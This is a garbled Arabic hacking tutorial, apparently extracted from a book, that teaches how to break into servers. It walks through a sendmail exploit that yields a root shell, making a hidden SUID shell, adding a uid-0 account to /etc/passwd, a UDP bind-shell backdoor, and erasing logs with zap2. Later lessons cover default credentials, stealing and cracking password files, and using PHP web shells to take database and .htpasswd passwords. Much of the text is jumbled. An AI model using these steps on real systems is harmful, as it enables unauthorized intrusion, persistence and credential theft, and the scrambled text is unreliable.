قدر‬ ‫المستطاع)احنا عايزينك =((‬ ‫فيه اكسبلويتات اخرى تعطيك صلحيه اظهار ملف الباسورد‪.‬لكن انا ساذكر لكم الساسيات‬ ‫فقط ‪.c‬‬ ‫و هي تعمل بفر اوفر فلو ‪ .‬انت لو كتبت ‪ exit‬حتطلع بره السيرفير ده و تعود للشيل بتاعك و عشان ترجع تاني يلزمك‬ ‫نفس الخطوات‬ ‫و في هذه الفتره قد يحتمل ان يكون الدمين قد قام بتغيير الباسورد او ركب باتش للديمون المصاب او قام‬ ‫بعمل اب جريد له‬ ‫مما يؤدي ان تفشل الكسبلويت في عملها ‪..‬ماذا بعد ؟؟؟فعل انت في امكانك ان تقوم بتغير الموقع او‬ ‫الصفحه الرئيسيه‬ ‫كل ما عليك ان تبحث عن الندكس في اي مكان او باستخدام المر فايند ‪..‬‬ ‫اذن حنعمل ايه دلوقتي؟؟‬ ‫في حاجه ‪.11 exploit‬‬ ‫‪usage: .c -o exploit‬‬ ‫‪sh-2./exploit target port‬‬ ‫‪sh-2...‬معنها اننا اخدنا شيل هناك‬ ‫تعال نشوف وضعنا ايه على السيرفير ‪:‬‬ ‫‪whoami$‬‬ ‫‪root‬‬ ‫يا عيني ‪../exploit‬‬ ‫‪This is a sendmail 8..<Last login: Fry Sep 15 11:45:34 from <yourIPaddress‬‬ ‫‪sh-2.com .‫‪.‬‬ ‫فاغلب الهاكرز بامكانهم اختراق هذه الدومينات‬ ‫و لكن انصحك جديا بتغيير الصفحه الرئيسيه في موقع محترم مثل‬ ‫‪microsoft.9.‬يمكننا اول عمل الكومبايل و تشغيله كتاللي‪:‬‬ ‫‪sh-2....03$ ..03$......‬و انما تديك بس شيل هنال‬ ‫لذلك يجب عليك ن تقوم برفع اكسبلةيت اخر لوكل ‪local‬‬ ‫للحصول على الرروت في النظام‪...‬كده انا بقيت رووت =(‬ ‫طيب فيه العديد من الكسبلويتت مش بتخليك رووت على السيستم‪...‬‬ ‫احسن باك دور هوه الهاك اتاك ‪.‬اي تي سي =<‬ ‫وضع باك دور ‪-:‬‬‫جميل ‪ .‬‬ ‫لكن هذا بصراحه و من غير زعل ‪.‬‬ ‫‪ -1‬ازاي تعمل ‪sushi‬؟؟؟؟‬ ‫‪247‬‬ .

.03$ vi /etc/passwd‬‬ ‫طبعا لزم يكون عندك فكره عن كيفيه استخدام المحرر ‪vi‬‬ ‫في الملف ده حتلقي سطر لكل يوزر عادي يكون على الشكل ده‬ ‫‪luser:passwd:uid:gid:startdir:shell‬‬ ‫في حاله السوبر يوزرز بيكون ال ‪uid & gid =0‬‬ ‫اذن اضف السطر ده ‪:‬‬ ‫‪dood::0:0:dood:/:/bin/sh‬‬ ‫و كده اانت ضفت سوبر يوزر للنظام‬ ‫‪sh-2.03$ whoami‬‬ ‫‪luser‬‬ ‫‪sh-2.03$ /dev/nul‬‬ ‫‪sh-2..03$ su dood‬‬ ‫‪sh-2.03$ cp /bin/sh /dev/nul‬‬ ‫هههههه‬ ‫في اغلب الحيان الدمين ل ينظر داخل الدايركتوري ‪ .‬تعالى نطلع بره كده و نشوف‬ ‫‪sh-2.‫لكي تقوم بعمل ‪ sushi‬او ‪ suid shell‬يلزمك ان تقوم بنسخ ال ‪bin/sh/‬‬ ‫الى مكان خفي و نقوم باعطاءه صلحيات ال ‪ suid‬كالتالي ‪:‬‬ ‫‪sh-2...‬‬ ‫كده خلصنا مهمتنا ‪.03$ chown root nul‬‬ ‫نعطي الشيل الصلحيات اللي احنا عايزينها ‪-:‬‬ ‫‪sh-2..‬خليك مع المر الول بيعمل‬ ‫في كله ‪.03$ exit‬‬ ‫بعد ‪ 80‬يوم لو رجعنا =‪ D‬تعال نشوف كده اللي حيحصل ‪:‬‬ ‫‪sh-2.‬‬ ‫و هو يسمح باعطاء صلحيات ال ‪ suid‬ل ‪ bin/sh/‬اذن نقدر نعمل الن ال ‪sushi‬‬ ‫‪ -2‬كيف نضيف يوزرز مزورين ؟؟‬ ‫طبعا انت رووت و تقدر تعمل تغيير في الملف ‪ etc/passwd/‬و ممكن من خلل الملف ده انك تضيف اي‬ ‫حد انت عايزه‬ ‫باستعمال المحرر ‪-: vi‬‬ ‫‪sh-2.03$ cd /dev‬‬ ‫‪sh-2.‬في كثير من الشيلز تمنع اعطاء صلحيات ال ‪ suid‬يعني مينفعش نحصل على ال ‪sushi‬‬ ‫و في هذه الحاله يلزمنا ان نرفع للسيرفير المخترق شيل خاص تاني اسمه ‪ sash‬و هو اختصار ل ‪A‬‬ ‫‪stand-alone shell‬‬ ‫ذو اوامر خاصه به ‪. dev‬و لو حصل و نظر دخله فانه لن يشعر بشيء‬ ‫غريب لن فيه ملف اساسا اسمه ‪null‬‬ ‫=‪ D‬ل ده احنا عيال جدعان اوي =‪D‬‬ ‫‪sh-2.03$ whoami‬‬ ‫‪root‬‬ ‫احنا سوبر يوزرز الن بكل سهوله =(‬ ‫فيه مشكله ‪ .‬‬ ‫خلي بالك ان المر ‪ chmod +s nul‬ممكن ميشتغلش في بعض النظمه ‪ .03$ chmod 4775 nul‬‬ ‫‪ 4775‬معناها ال ‪ suid‬اللي احنا عايزينها ‪..03$ whoami‬‬ ‫‪dood‬‬ ‫‪248‬‬ ..

‬و ن ان شاء ال‬ ‫حاتصل بمزود الخدمه في المنطقه و اساله عن رقم التلفون و ان شاء ابلغ البوليس ‪.‬‬ ‫يعني سيادتك لو دخلت باسم يوزر و بعد كده اليوزر ده دخل حيلقي الرساله دي‬ ‫‪....‬‬ ‫بيكون معاه ملف للمساعده اقراه لكي تعرف طريقه الستخدام ‪.‬‬ ‫الطريف و الشيق في الموضوع انه الدمين لما ييجي يعمل سكان على الجهاز بتاعه للتامين عاده و في اغلب‬ ‫الحيان السكن يكون‬ ‫على منافذ ال ‪ TCP‬و نادرا جدا ان يعمل سكان على منافذ بروتوكول ‪UDP‬‬ ‫ عمليه ازاله الثار ‪-:‬‬‫في نظاام اليونيكس ‪.‬‬ ‫البايند شيل هذا يقوم بفتح بورت او منفذ يعني و لكنه ليس منفذ ‪ TCP‬بل منفذ ‪UDP‬‬ ‫و طبعا بيعطيك شيل عند التصال بهذا البورت ‪.‬عندما تقوم بالدخول الى حسابك ‪ ....03$ who‬‬ ‫‪sh-2...03$‬‬ ‫كلمه اخيره ‪:‬‬ ‫‪249‬‬ .03$ who‬‬ ‫‪Sep 25 18:18‬‬ ‫‪tty1‬‬ ‫‪root‬‬ ‫ممكن في الحاله دي نستخدم ‪zap2‬‬ ‫لو اسمك ‪: luser‬‬ ‫‪sh-2..03$ .‬‬ ‫و بالهنا و الشفا =(‬ ‫المعلومات دي موجوده في المناطق دي‬ ‫‪usr/adm/lastlog/‬‬ ‫‪var/adm/lastlog/‬‬ ‫‪var/log/lastlog/‬‬ ‫يمكنك مسحهم باستخدام ‪ lled‬و دي ممكن تلقيها في اي موقع مهتم ‪.‫طبعا احنا رووت ‪..‬‬ ‫في حاله استخدام ‪ ftp‬لرفع الدوات يتخلف عن ذلك معلومات ايضا يمكنك ازالتها‬ ‫باستخدام ‪ wted‬و هو شبيه بالده السابقه ‪lled‬‬ ‫ماذا لو طبقنا المر ‪ who‬و لقينا معانا الرووت ؟؟‬ ‫‪sh-2.<Last login: Sun Sep 24 10:32:14 from <yourIPaddress‬‬ ‫و طبعا سيادتك كده حتتكشف‬ ‫لن اليوزر ده لو كان ناصح حيبعت ايميل للدمين و يقوله و يبلغه باللي حصل‬ ‫و طبع الدمين في الحال حيبعتله رساله و يقوله ‪-:‬‬ ‫متخافش يا واد ده واحد دخل على الحساب بتاعك و الي بي بتاعه موجوود ‪ .‬فنكا ترى رساله عند اول الدخول تعلمك باخر مره‬ ‫قمت بها بالدخول و رقم الي بي الذي دخلت منه ‪.‬ليه لن الخ ‪ dood‬كل من ال ‪ gid‬و ال ‪ uid‬يساوي صفر‬ ‫‪ -3‬كيف تضع ‪ bindshell‬؟‬ ‫‪ bindshell‬عباره عن ديمون شبيه جد بال ‪ telnetd‬في الحقيقه التلنت ديمون عباره عن بايند شيل ‪../zap2 luser‬‬ ‫‪!Zap2‬‬ ‫‪sh-2.

.‬‬ ‫و أنا كالعادة لست مسؤول عن أي تصرف غبي أو أحمق يقوم به أي شخص و هذه المعلومات للعرض و‬ ‫زيادة المعرفة الشخصية‬ ‫في هذا القسم أقوم بشرح الخطوات الساسية للقيام بعملية اختراق و تخريب على الشبكة فإذا كان لديك أية‬ ‫معلومات أو شروح تود نشرها في هذا القسم الرجاء القيام بإرسالها لنا‬ ‫الـــهـــكـــر‬ ‫نحن هنا في حاجة إلى خلفية بسيطة قبل الخول في التعقيدات‬ ‫‪250‬‬ .‬‬ ‫اتمنى ان يحوز على رضاكم‪.‬‬ ‫انتهى‪،،،‬‬ ‫" درس اخر في اختراق المواقع عن طريق لينكس "‬ ‫>ةةةةة ةة ةةةةة ةةةة ةةةةةة<‬ ‫>ةةةةةة‪ :‬ةةة ةةة <‬ ‫اختراق لينكس‪.‫هذا الموضوع هو عباره عن نبذه بسيطه للمبتدئين يمكنهم من البدايه بدايه موفقه باذن ال ‪...

‬جمع المعلومات‬ ‫لبد أنك جاهز الن قم بتشغيل ‪ notepade‬ونافذة متصفح جديد من خلل محطم أي بي أو أي موقع آخر‬ ‫مثل‬ ‫‪Hakkerz.ml.com‬مزود خدمات على النترنت‬ ‫الذي سيقوم بإعطائه ‪:‬‬ ‫اسم مستخدم و هو التعريف لمجلد راشد على الشبكة‬ ‫كلمة مرور و هي مفتاحه للدخول إلى مجلده و قسمه‬ ‫و هذان هما السبيل للوصول إلى جميع الخدمات المتاحة لراشد‬ ‫و سوف نركز على الوصول إلى اللب والصل‬ ‫هناك طريقتان رئيستان للدخول إلى نظام الولى تتمثل في الحصول على خليط من كلمة سر و اسم مستخدم و‬ ‫هي بطيئة و نادرة وأما الطريقة الثانية فهي استغلل مناطق ضعف الخادم و التسلل من خللها‬ ‫إن التخريب ممنوع و لنه من السهل مطاردتك إن إكتشاف محولتك للختراق عن طريق الي بي أدرس فهو‬ ‫رقم تعريفك على الشبكة و الحل هو أن تقوم بإعطاء بينات خاطئة لمزود خدمات شبكتك‬ ‫يستخدم المخترقون أدوات لسرقة الرقم السري و اسم المستخم من الماكن العامة مثل مقاهي النترنت و هذا‬ ‫أحد البرامج‬ ‫قم بتغيير البروكسي و هذا هو السهل أو التسجيل ببيانات و همية لموقع يضمن لك التصفح بخصوصية و قم‬ ‫بتعطيل خدمة ‪ Caller ID‬إذا كانت تعمل‬ ‫نحن الن نأخذ الخطوة الولى لي عملية هكر ‪..home.‫إن قول اختراق أو تخريب يعني الحصول على صلحيات على سيرفرات الشبكات ل يسمح لنا بالحصول عليها‬ ‫في الحوال العادية فخوادم الشبكات معدة لستقبال العديد من الناس و لكل فرد منهم حساب على الشبكة‬ ‫فالنفترض أن لراشد حساب على الفريسرفرز‬ ‫‪ FreeServers..org‬‬ ‫قم بفحص الموقع و تسجيل أي إيميل موجود و قم بنسخ ‪ html‬لي صفحة مهمة‬ ‫قم بإرسال و همي لهم أقصد إيميل غير موجود مثل‬ ‫‪@Blahblahblah‬اسم الموقع‬ ‫و ينصح بإرساله من موقع بريد مجاني واستخدام جميع امكانياته المهم سيأتيك إيميل بسبب عدم جود البريد‬ ‫المرسل إليه و معه بعض المعلومات الموجوده في ‪ header‬الرسالة‬ ‫أنت الن في حاجة إلى أدوات تعقب لمعرفة بعض المعلومات عن المزود للخادم الضحية‬ ‫أول ستحتاج إلى الي بي ‪ IP‬و ثانيا خدمة التعريف ‪ Whois‬لتحصل عن معلومات عنه‬ ‫الذي سيعطيك معلومات عن مالكي الموقع و نوع السيرفر عليه و قم بتسجيلها‬ ‫‪251‬‬ .

com‬‬ ‫كلمة ‪ telnet‬كما ترى مكان ‪ www‬و إذا لم ينجح جرب أي من مواقع السرفرات التي حصلنا عليها من‬ ‫‪ whois‬و بمجرد نجاحك في الدخول قم بتسجيل أية بيانات تحتاجها و بالتحديد نوع السيرفر‬ ‫الن قم بتغيير المنفذ إلى ‪ 21‬و الن سيأخذك إلى منفذ ال ‪ ftp‬فإن حصل ذلك جرب كتابة‬ ‫‪ SYST‬لتعرف نوع السيرفر الن إذا كنت محظوظا جرب المنفذ ‪ 80‬الذي يعد منفذ ال ‪ http‬وسجل أي‬ ‫بينات و أهمها على الطلق نوع السيرفر فإذا لم تنجح بعد ذلك كله جرب برنامج يدعى ‪Whats‬‬ ‫‪ ?Running‬و قد يعمل و لكن سيرفر الضحية سيسجل ذلك‬ ‫و كما ذكرت في البداية هناك طريقتان استخدام البرامج أو ايجاد الباسوورد و لنجرب الن الباسوورد الذي‬ ‫ستحصل عليه باستخدام‬ ‫‪Login: root$‬‬ ‫‪Password: root$‬‬ ‫فلنقم بتجربة هذا أول حيث أن برامج ‪ linux‬تأتي محملة بعدد من الباسوورد الجاهزة و هي غالبا تبقى كما‬ ‫هي لذلك عليك القيام باتصال باستخدام ‪ telnet‬و الذي هو من الموقع سالف الذكر و ل تستخدم البرنامج‬ ‫العادي الموجود على جهازك وقم بتجربة الباسوورد و اسماء المستخدمين التالية‬ ‫‪ACCOUNT: PASSWORD‬‬ ‫)‪login) root: (password) root‬‬ ‫‪sys: sys / system / bin‬‬ ‫‪bin: sys / bin‬‬ ‫‪mountfsys: mountfsys‬‬ ‫‪adm: adm‬‬ ‫‪uucp: uucp‬‬ ‫‪nuucp: anon‬‬ ‫‪anon: anon‬‬ ‫‪user: user‬‬ ‫‪games: games‬‬ ‫‪install: install‬‬ ‫‪252‬‬ .org‬المهم فلنتابع حديثنا قم بفتح نافذة ‪ telnet‬و غير المنفذ إلى ‪ 23‬و إذا كان‬ ‫الموقع يبدأ ب ‪ www‬فجرب ذلك بدونها فإن لم يقم بإعطائك بينات فجرب إضافة ‪telnet.‫الن عليك باستخدام خاصية ‪ finger‬جرب أول‬ ‫اسم الموقع ‪@Finger‬‬ ‫و إذا لم يقم بإعطائك معلومات التي قد تكون مفيدة جرب ايميل من التي حصلنا عليها في العلى‬ ‫الن عليك القيام بفحص المنافذ ‪ scan ports‬للي بي ‪ IP‬الذي حصلنا عليه لكي تعرف المنافذ المفتوحة‬ ‫و الخدمات التي يدعمها الموقع و هناك برامج جيدة لذلك و معظمها لنظمة ‪Linux /Unix systems‬‬ ‫و هذا البرنامج ‪ Exploit Generator‬خاص بأنظمة ويندوز على الشبكات‬ ‫و إن كنت ستخترق موقع شديد الحراسة فدعنا ننسى تفحص المنافذ لمدة لن هذا العمل غير شرعي و قد يتم‬ ‫الكشف عنه إل إذا ما كنت تمتلك نظام ‪ linux‬ما يهمنا من ذلك أنه إذا كان المنفذ ‪ 21‬مفتوحا فيعني ذلك‬ ‫أنهم يدعمون ‪ FTP‬و إن كان ‪ 23‬فذلك أنهم يملكون ‪TelNet‬‬ ‫‪ Telnet‬الهدف من ذلك هو معرفة نوع السيرفر و أنت في وضع ‪ Anonymous‬في متصفحك و على‬ ‫العموم للقيام بكل تلك المور سالفة الذكر ستجد ما تحتاجه في الموقع التالي حتى ل تتعب في البحث‬ ‫‪ hakkerz.ml.Victim.home.

net‬أو ‪ /ftp://ftp.‬‬ ‫انتهى‪،،،‬‬ ‫‪253‬‬ .home.5‬و الذي يحتاج إلى ملفات كلمات كثيرة‪.org‬سنعيد‬ ‫الكرة ثانية بل إن عملنا السابق و القادم يعتمد على اخفاء الي بي و قم بالتجربة عن طريق الشكل التالي‬ ‫مثل‬ ‫‪ ftp:// abc.‫‪demo: demo‬‬ ‫‪umountfsys: umountfsys‬‬ ‫‪sync: sync‬‬ ‫‪admin: admin‬‬ ‫‪guest: guest‬‬ ‫‪daemon: daemon‬‬ ‫و إذا لم تصلح فإن هناك العديد من الناس الغبياء الذين يستخدمون أسماء الدخول كباسوورد قم بتجربة‬ ‫الشق الول من البريد اللكتروني كإسم مستخدم و كذلك كباسوورد أو من البيانات التي حصلت عليها من‬ ‫‪ whois‬و أن كنت تعيس الحظ إلى الن قم بالتجربة التالية على افتراض أنك تحاول الدخول إلى نظام ‪unix‬‬ ‫فإنك لربما تتساءل كيف يتعرف النظام إلى الباسوورد و الجواب أن هناك ملف يدعى ‪ passwd‬لذلك علينا‬ ‫المحاولة للوصول إليه و إحدى الطرق القديمة هي استخدام ال ‪ ftp‬و الذي سندخل إليه باستخدام نافذة‬ ‫المتصفح و في نظري ‪ internet explorer‬ينفع في هذه الحالة و لكن عليك أن تكون غير معرف لهم و‬ ‫كما فتحنا النافذة سابقا باستخدام ‪ IP jammer‬الموجود في موقع ‪ .hakkerz.etc‬‬ ‫و هنا ترى اسم المستخدم و هو ‪ kangaroo‬و تشفير الباسوورد وليس هي هو ‪ 3a62i9qr‬أو سيكون‬ ‫المنظر فوق أشبه بالتالي‬ ‫‪root:*:0:1:Operator:/:/bin/csh‬‬ ‫‪admin:*:100:11:WWW administrator:/home/Common/WWW:/bin/csh‬‬ ‫‪kangaroo:*:1012:10:Hisaharu‬‬ ‫‪TANAKA:/home/user/kangaroo:/usr/local/bin/tcsh‬‬ ‫و هنا كما تشاهد فإن الباسوورد المشفرة استعيض عنها بباسوورد يصعب فك تشفيرها و هو‬ ‫*’‪ s‬أو ‪ ?x’s‬و إن حصلت على النوع في العلى فإن هناك برامج مخصصة لملفات الباسوورد ليونكس و‬ ‫فك تشريرها مثل ‪ John the Ripper 1.ml.abc.net‬و إن لم يعمل أي منها قم بتجربة أي مواقع ‪ ftp‬كانت‬ ‫موجودة في البيانات المعطاة من ‪ whois‬فالنفترض أنك نجحت في الدخول اضغط على مجلد \‪ etc‬و الن‬ ‫ستر ملف ‪ passwd‬قم بتنزيله على جهازك وقم بفتحه و إن كان على الشكل التالي فأنت محظوظ‬ ‫‪root:2fkbNba29uWys:0:1:Operator:/:/bin/csh‬‬ ‫‪admin:rYsKMjnvRppro:100:11:WWW‬‬ ‫‪administrator:/home/Common/WWW:/bin/csh‬‬ ‫‪kangaroo:3A62i9qr:1012:10:Hisaharu‬‬ ‫]‪[.

.‬‬ ‫البي اتش بي شيل ملف يرعب كل صاحب موقع على سيرفر وحله اسهل مما يمكن‬ ‫ل فسمحولي ‪(:‬‬ ‫الموضوع بسيط جدًا لكن سأطوله قلي ً‬ ‫اوًل ‪:‬‬ ‫راجع الوصلة التالية‬ ‫ثانيًا ‪:‬‬ ‫‪254‬‬ .‫" درس عن الـ ‪) PHP Shell‬الجزء الول( "‬ ‫>منقول من موقع ‪< pharaonics‬‬ ‫>الكاتب‪> Arab VieruZ:‬‬ ‫موضوع للبي اتش بي شل يشرح الطرق والخداع المستخدمة و اوامر لينكس‬ ‫السلم عليكم‪..

‫الن وبعد قراءتك الموضوع كامل اتوقع منك معرفة ما هو الـ ‪PHP Shell‬‬ ‫*‪*-----------------------------------------------‬‬ ‫الجزء الول ‪:‬‬ ‫اوامر لينكس‬ ‫*‪*-----------------------------------------------‬‬ ‫امر سرد الملفات ‪ls -a :‬‬ ‫سرد جميع الملفات المخفية او غيرها‬ ‫*‪*-----------------------------------------------‬‬ ‫امر عرض محتويات الملف ‪ cat -e :‬او ‪cat‬‬ ‫فتح الملف وعرض محتوياته‬ ‫*‪*-----------------------------------------------‬‬ ‫امر حذف الملف ‪rm -f :‬‬ ‫لحذف الملف الذي تريد‬ ‫*‪*-----------------------------------------------‬‬ ‫امر حذف المجلد ‪rm -d :‬‬ ‫لحذف المجلد الذي تريد‬ ‫*‪*-----------------------------------------------‬‬ ‫امر النسخ ‪cp -i :‬‬ ‫لنسخ الملف الذي تريد‬ ‫*‪*-----------------------------------------------‬‬ ‫امر اعادة التسمية ‪mv :‬‬ ‫لعادة التسمية‬ ‫*‪*-----------------------------------------------‬‬ ‫ملحظة ‪ :‬لمعرف المزيد من اوامر لينكس قم بشراء الكتب وللحصول على‬ ‫معلومات اكثر لمر من الوامر كم بوضع المر ثم ‪help--‬‬ ‫‪255‬‬ .

‫مثال ‪ls --help :‬‬ ‫*‪*-----------------------------------------------‬‬ ‫*‪*-----------------------------------------------‬‬ ‫*‪*-----------------------------------------------‬‬ ‫الجزء الثاني ‪:‬‬ ‫كيفية تنفيذ الوامر ‪:‬‬ ‫*‪*-----------------------------------------------‬‬ ‫‪256‬‬ .

txt‬‬ ‫*‪*-----------------------------------------------‬‬ ‫‪ -2‬لنفرض اننا نريد اختراق موقع معين وكان صاحب الموقع ذكي جدًا وحريص‬ ‫هذي طريقه قد تنفع اوًل تحديد الشركة المستضيفة و نحاول البحث عن مواقع‬ ‫في نفس السيرفر او على القل في نفس شركة الستضافة يكون صاحبها دلخ‬ ‫ونحاول نلقى ثغرة نحمل منها الملف‬ ‫*‪*-----------------------------------------------‬‬ ‫‪ -3‬المواقع المجانية التي تدعم البي اتش بي‪.‬‬ ‫انتهى‪،،،‬‬ ‫‪257‬‬ .‫‪ -1‬ستجد مربع للكتابة قم بكتابة المر المراد تنفيذه‬ ‫‪ -2‬هنا تعرض الملفات والمجلدات‬ ‫‪ -3‬هنا تعرض المجلدات فقط‬ ‫‪ -4‬مكان الفلودر الذي تعمل عليه الن‬ ‫‪ -5‬ضع العلمة ليخبرك ما يحدث عند وجود خطأ‬ ‫*‪*-----------------------------------------------‬‬ ‫*‪*-----------------------------------------------‬‬ ‫الجزء الثالث ‪:‬‬ ‫الخدع والطرق لتحميل هذا الملف ‪:‬‬ ‫*‪*-----------------------------------------------‬‬ ‫هنا تأتي المشكله !!!‬ ‫لكن ليست مستحيله وسنستعرض بعض الطرق التي اتبعها انا شخصيًا‬ ‫‪ -1‬ايجاد ثغرة تستطيع منها تحميل الملف‬ ‫مثال ‪ :‬ثغرة النوك القديمة حقت الـ ‪hacked.

php‬‬ ‫وسيظهر الباسورد في احد المتغيرات‬ ‫‪258‬‬ .php‬‬ ‫ويمكن اخذ الباس عن طريق تنفيذ المر التالي في الـ ‪PHP Shell‬‬ ‫الذهاب الى المجلد الذي يوجد فيه هذا الملف وكتابة المر التالي‬ ‫‪cat config.‬‬ ‫*‪*-----------------------------------------------‬‬ ‫‪ -1‬اخذ الباس من ملفات اكسس الـ ‪ My SQL‬التي تسمى بالعادة ‪config.‫" درس عن الـ ‪) PHP Shell‬الجزء الثاني( "‬ ‫>ةةةةة ةة موقع ‪< pharaonics‬‬ ‫>ةةةةةة‪> Arab VieruZ:‬‬ ‫نتابع الموضوع مباشره‬ ‫*‪*-----------------------------------------------‬‬ ‫*‪*-----------------------------------------------‬‬ ‫الجزء الرابع ‪:‬‬ ‫طرق الحصول على الباسورد‪:‬‬ ‫*‪*-----------------------------------------------‬‬ ‫هذا الجزء سيأخذ موضوع الـ ‪PHP Shell 2‬‬ ‫طرق الحصول على الباسورد هي من اصعب الطرق التي قد تواجه المخترق ‪.

‬حتى تجد مكان الملف السابق‬ ‫مثال ‪/home/site/.‬‬ ‫ويمكن اجاد هذا الملف في احد مجلدات السيرفر واذا لم تجده قم بفتح‬ ‫الـ ‪ htaccess.htpasswds/forum/admin/passwd :‬‬ ‫المر ‪cat /home/site/.pwd :‬‬ ‫رابط ‪ :‬راجع درس ‪ DeXXa‬الخاص بهذا القسم‬ ‫‪user:nymw4oS3oerdY‬‬ ‫*‪*-----------------------------------------------‬‬ ‫‪ -4‬ل يمكن اعتبارها كقسم لكن كملحظة ال وهي ‪:‬‬ ‫ان بعض المواقع تتحد في سكربتات مثل الـ ‪phpMyAdmin‬‬ ‫ويكون لكن موقع اكسس خاص لدخول هذا السكربت‬ ‫ويكون بملف الـ ‪ config.htpasswds/forum/admin/passwd :‬‬ ‫ستجد الباس المشفر بتشفير ‪ DES‬يعني تقدر تفكه بجون ذا رايبر‬ ‫‪user:nymw4oS3oerdY‬‬ ‫*‪*-----------------------------------------------‬‬ ‫‪ -3‬طريقة الكستينشون سيرفر او ‪: service.‫*‪*-----------------------------------------------‬‬ ‫‪ -2‬اخذ الباس المشفر من ملف الـ ‪htpasswed.pwd‬‬ ‫وهو تابع للفرونت بيج ويوجد به الباسورد الخاص بالفرونت بيج مشفر ‪DES‬‬ ‫ويوجد داخل مجلد ‪:‬‬ ‫_‪vti_pvt‬‬ ‫المر ‪cat /home/site/www/_vti_pvt/service.php‬يكون الروت للقاعدة‬ ‫يعني يمكن تعدل وتمسح اي قاعدة لي موقع كان !!‬ ‫انتهى‪،،،‬‬ ‫‪259‬‬ .

‫" درس عن الـ ‪) PHP Shell‬الجزء الثالث( "‬ ‫>ةةةةة ةة موقع ‪< pharaonics‬‬ ‫>ةةةةةة‪> Arab VieruZ:‬‬ ‫الجزء الخامس و الخير من هذا الدرس‬ ‫بما انك الن عرفت معظم الشياء لكن لبد من وجود مشاكل سأذكر الذي اصابني‬ ‫*‪*-----------------------------------‬‬ ‫‪ -1‬مشكلة عرض المواقع الخرى ‪:‬‬ ‫جميع المواقع الموجودة في السيرفر في ‪:‬‬ ‫‪home/‬‬ ‫المر ‪ :‬قم بالذهاب الى مجلد الروت ‪/‬‬ ‫‪ls -a /home‬‬ ‫ستجد مجلدات كل مجلد يحوي ملفات موقع ما لعرضه‬ ‫‪ls -a /home/SITE‬‬ ‫‪ = SITE‬اسم الموقع او المجلد‬ ‫*‪*-----------------------------------‬‬ ‫‪ -2‬مشكلة عرض ملفات الموقع ‪:‬‬ ‫بعض السيرفرات ل تسمح بدخول ‪ home‬الموقع ال اذا كنت انت روت او صاحب الموقع‬ ‫الحل ‪:‬‬ ‫‪260‬‬ .

‫قم بدخول ‪:‬‬ ‫‪/home/site/public_html‬‬ ‫او‬ ‫‪/home/site/www‬‬ ‫لدخول الى ملفات الموقع التي تعرض‬ ‫*‪*-----------------------------------‬‬ ‫‪ -3‬بعض الوامر ل تعمل‬ ‫هذه مشكله من الصعب حلها ويجب استعمال باك دور خاص بكرنل السيرفر‬ ‫اقصد اصدار الكرنل‪.‬‬ ‫انتهى‪،،،‬‬ ‫‪261‬‬ .

‫" شرح أداة ‪" anmap‬‬ ‫>ةةةةة<‬ ‫>ةةةةة ةةةةةة‪ :‬ةةةةة ةةةةةة<‬ ‫السم ‪:‬‬ ‫‪ .and Null scan‬‬ ‫النماب تقدم أيضًا عدد من المميزات المتقدمة ‪ .nmap‬أداة كشف عن الشبكات و ماسح أمني‬ ‫الخلصة ‪:‬‬ ‫أنواع المسح ‪ -‬الخيارات‬ ‫الوصف ‪:‬‬ ‫صمم هذا البرنامج لكي يسمح لمدراء النظام و الفراد بمسح شبكات كبيرة‬ ‫لتقرير و معرفة المضيفين وماذا يقدمون من خدمات ‪ .‬وتدعم النماب‬ ‫عدد كبير من تقنيات المسح مثل ‪:‬‬ ‫‪UDP‬‬ ‫‪()TCP connect‬‬ ‫‪(TCP SYN (half open‬‬ ‫‪(ftp proxy (bounceattack‬‬ ‫‪Reverse-ident‬‬ ‫‪(ICMP (ping sweep‬‬ ‫‪FIN‬‬ ‫‪ACK sweep‬‬ ‫‪Xmas Tree‬‬ ‫‪SYN sweep‬‬ ‫‪..‬مثل‪:‬‬ ‫‪remote OS detection via TCP/IP fingerprinting‬‬ ‫‪stealth scanning‬‬ ‫‪dynamic delay and retransmission calculations‬‬ ‫‪parallel scanning‬‬ ‫‪262‬‬ .

‫‪detection of down hosts via parallel pings‬‬
‫‪decoy scanning port‬‬
‫‪filtering detection‬‬
‫‪direct (non-portmapper) RPC scanning‬‬
‫‪fragmentation scanning‬‬
‫‪flexible target and port specification‬‬
‫نتائج النماب عادةًا ماتكون على هيئة قائمة بالبورتات المهمه التي توجد‬
‫في اللة التي أجريت عليها عملية المسح ‪ .‬والنماب دائمًا يعطينا البورتات وإسم الخدمة والعدد والحالة‬
‫والبروتوكول‬
‫الحاله إما أن تكون مفتوحة او مرشحة أو غير مرشحة‬
‫مفتوحة تعني أن اللة سوف تقبل أي إتصال بهذا البورت‬
‫المرشحة تعني أن هناك فايروول أو فلتر )مرشح( أو أي عقبة أخرى تغطي هذا البورت وتمنع النماب من‬
‫معرفة حالة البورت إذا كان مفتوحًا أو ل‬
‫غير مرشح تعني بأن هذا البورت معروف لدى النماب بأنه مغلق‬
‫ول يبدو أن أي فايروول أو فلتر )مرشح( تدخل في محاولة النماب‬
‫والبورتات غير المرشحة هي أغلب الحالت ول يمكن معرفتهم إل في حالة واحدة ‪ ،‬هي أن يكون معظم‬
‫البورتات‬
‫التي أجريت لهم عملة المسح في حالة ترشيح‬
‫وبالعتماد على الخيارات المستخدمه في النماب فيمكن أن يبلغ عن الحالت المميزة التالية في الريموت‬
‫هوست ‪:‬‬
‫النظام المستخدم‬
‫‪TCP sequencability‬‬
‫أسماء المستخدمين الذين يشغلون البرامج المرتبطة بكل بورت‬
‫أسماء الدي إن إس‬
‫وبعض الشياء الخرى‪.‬‬

‫انتهى‪،،،‬‬

‫‪263‬‬

‫" طريقة لقتحام السيرفرات بدون ثغرات "‬
‫>منقول من منتديات شبكة الحزم السلمية<‬
‫>الكاتب‪<network access :‬‬
‫استخدام الثغرات انا بصراحه ماشوف فيه اي فن ول علم بصراحه انت تستخدم شي جاهز وهذي وجه نظري‬
‫يعني ماتحس انك تسوي شي متعب ياخذ منك جهد ووقت‬
‫لكن في طرق كثيره جدا غير استخدام الثغرات ويمكن كل واحد له طريقته واسلوبه حتى في استغلل الثغرات‬
‫لكن بما انك انسان يفترض انك هاكر وتشوف نفسك متمكن اعتقد مسئله اقتحام سيرفر او موقع ماراح‬
‫تربطها بوقت وزمان يعني ممكن الواحد يجلس يحاول لمده شهر شهرين ثلثه وكل مره يفشل الين يقدر‬
‫يوصل في الخير لنتيجه وعلى الساس هذا انا كتبت الموضوع هذا الي انشال اتمنى انه يكون مفيد وينفعنا‬
‫ال فيه‬
‫ماراح نتكلم عن المشاركه) احس اني ازعجتكم بمواضيع المشاركه (‬
